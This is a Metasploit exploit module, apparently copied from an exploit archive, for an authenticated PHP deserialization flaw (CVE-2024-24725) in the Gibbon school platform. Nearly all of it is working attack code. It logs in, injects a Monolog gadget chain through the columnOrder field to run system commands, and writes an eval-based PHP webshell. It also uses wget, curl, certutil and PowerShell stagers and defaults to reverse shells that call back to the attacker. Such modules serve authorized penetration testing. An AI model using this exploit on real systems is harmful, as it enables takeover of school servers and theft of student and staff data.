Share
## https://sploitus.com/exploit?id=1337DAY-ID-39554
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Gibbon School Platform Authenticated PHP Deserialization Vulnerability',
        'Description' => %q{
          A Remote Code Execution vulnerability in Gibbon online school platform version 26.0.00 and lower
          allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a
          POST request to the endpoint `/modules/System%20Admin/import_run.php&type=externalAssessment&step=4`.
          As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
          potentially resulting in complete system compromise, data exfiltration, or unauthorized access
          to sensitive information.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
          'Ali Maharramli', # SecondX.io Research Team - discovery of the vulnerability
          'Fikrat Guliev', # SecondX.io Research Team - discovery of the vulnerability
          'Islam Rzayev' # SecondX.io Research Team - discovery of the vulnerability
        ],
        'References' => [
          ['CVE', '2024-24725'],
          ['URL', 'https://attackerkb.com/topics/ogKGAB44BP/cve-2024-24725'],
          ['PACKETSTORM', '177635'],
          ['EDB', '51903']
        ],
        'DisclosureDate' => '2024-03-18',
        'Platform' => ['php', 'unix', 'linux', 'win'],
        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],
        'Privileged' => false,
        'Targets' => [
          [
            'PHP',
            {
              'Platform' => ['php'],
              'Arch' => ARCH_PHP,
              'Type' => :php,
              'DefaultOptions' => {
                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Unix Command',
            {
              'Platform' => ['unix', 'linux'],
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_bash'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => ['linux'],
              'Arch' => [ARCH_X64, ARCH_X86],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],
              'Linemax' => 16384,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'Type' => :windows_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Windows Dropper',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X64, ARCH_X86],
              'Type' => :windows_dropper,
              'Linemax' => 16384,
              'CmdStagerFlavor' => ['psh_invokewebrequest', 'vbs', 'debug_asm', 'debug_write', 'certutil'],
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 443
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [ true, 'The Gibbon online school platform endpoint URL', '/' ]),
      OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]),
      OptString.new('USERNAME', [true, 'Gibbon username to login, typically an e-mail address']),
      OptString.new('PASSWORD', [true, 'Password'])
    ])
  end

  def gibbon_login
    # construct multipart login form data
    form_data = Rex::MIME::Message.new
    form_data.add_part('', nil, nil, 'form-data; name="address"')
    form_data.add_part('default', nil, nil, 'form-data; name="method"')
    form_data.add_part(datastore['USERNAME'].to_s, nil, nil, 'form-data; name="username"')
    form_data.add_part(datastore['PASSWORD'].to_s, nil, nil, 'form-data; name="password"')
    form_data.add_part('025', nil, nil, 'form-data; name="gibbonSchoolYearID"')
    form_data.add_part('0002', nil, nil, 'form-data; name="gibboni18nID"')

    return send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'login.php?timeout=true'),
      'keep_cookies' => true,
      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
      'data' => form_data.to_s
    })
  end

  def construct_form_data(payload)
    # construct multipart form data with payload
    payload_len = payload.length
    payload_data = "a:2:{i:7;O:32:\"Monolog\\Handler\\SyslogUdpHandler\":1:{s:9:\"\x00*\x00socket\";O:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"\x00*\x00handler\";r:3;s:13:\"\x00*\x00bufferSize\";i:-1;s:9:\"\x00*\x00buffer\";a:1:{i:0;a:2:{i:0;s:#{payload_len}:\"#{payload}\";s:5:\"level\";N;}}s:8:\"\x00*\x00level\";N;s:14:\"\x00*\x00initialized\";b:1;s:14:\"\x00*\x00bufferLimit\";i:-1;s:13:\"\x00*\x00processors\";a:2:{i:0;s:7:\"current\";i:1;s:6:\"system\";}}}i:7;i:7;}"

    form_data = Rex::MIME::Message.new
    form_data.add_part('/modules/System Admin/import_run.php', nil, nil, 'form-data; name="address"')
    form_data.add_part('sync', nil, nil, 'form-data; name="mode"')
    form_data.add_part('N', nil, nil, 'form-data; name="syncField"')
    form_data.add_part('', nil, nil, 'form-data; name="syncColumn"')
    form_data.add_part(payload_data.to_s, nil, nil, 'form-data; name="columnOrder"')
    form_data.add_part('N;', nil, nil, 'form-data; name="columnText"')
    form_data.add_part('%2C', nil, nil, 'form-data; name="fieldDelimiter"')
    form_data.add_part('%22', nil, nil, 'form-data; name="stringEnclosure"')
    form_data.add_part("#{Rex::Text.rand_text_alpha(8..16)}.xlsx", nil, nil, 'form-data; name="filename"')
    form_data.add_part('"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"', nil, nil, 'form-data; name="csvData"')
    form_data.add_part('1', nil, nil, 'form-data; name="ignoreErrors"')
    form_data.add_part('Submit', nil, nil, 'form-data; name="Failed"')
    return form_data
  end

  def upload_webshell(b64_payload)
    # randomize file name if option WEBSHELL is not set
    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")

    # create webshell with base64 encoded PHP payload
    # works for both windows and linux targets
    php_payload = "echo \"<?php @eval(base64_decode(\'#{b64_payload}\'));?>\" > #{@webshell_name}"
    form_data = construct_form_data(php_payload)

    # upload webshell
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),
      'keep_cookies' => true,
      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
      'data' => form_data.to_s
    })
  end

  def execute_php(cmd, _opts = {})
    payload = Base64.strict_encode64(cmd)
    res = upload_webshell(payload)
    fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200
    register_file_for_cleanup(@webshell_name)

    # execute webshell
    send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, @webshell_name),
      'keep_cookies' => true
    })
  end

  def execute_command(cmd, _opts = {})
    form_data = construct_form_data(cmd)
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),
      'keep_cookies' => true,
      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
      'data' => form_data.to_s
    })
  end

  def check
    print_status("Checking if #{peer} can be exploited.")
    res = send_request_cgi!({
      'method' => 'GET',
      'ctype' => 'application/x-www-form-urlencoded',
      'uri' => normalize_uri(target_uri.path)
    })
    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200

    # check if target is running the Gibbon online school platform
    # search for the Gibbon version on the login page
    return CheckCode::Safe('No Gibbon school platform found.') unless res.body.include?('Gibbon')

    # trying to get the version
    version = res.body.match(/Gibbon.*v(\d+\.\d+\.\d+)/)
    version_number = version[0].split('v') unless version.nil?
    if version_number
      if Rex::Version.new(version_number[1]) <= Rex::Version.new('26.0.00')
        return CheckCode::Appears("Gibbon v#{version_number[1]}")
      else
        return CheckCode::Safe("Gibbon v#{version_number[1]}")
      end
    end
    CheckCode::Detected
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    res = gibbon_login
    fail_with(Failure::NoAccess, "Login failed with user #{datastore['USERNAME']} and password #{datastore['PASSWORD']}.") unless res && res.code == 302

    case target['Type']
    when :php
      execute_php(payload.encoded)
    when :unix_cmd, :windows_cmd
      execute_command(payload.encoded)
    when :linux_dropper, :windows_dropper
      # don't check the response here since the server won't respond
      # if the payload is successfully executed.
      execute_cmdstager({ linemax: target.opts['Linemax'] })
    end
  end
end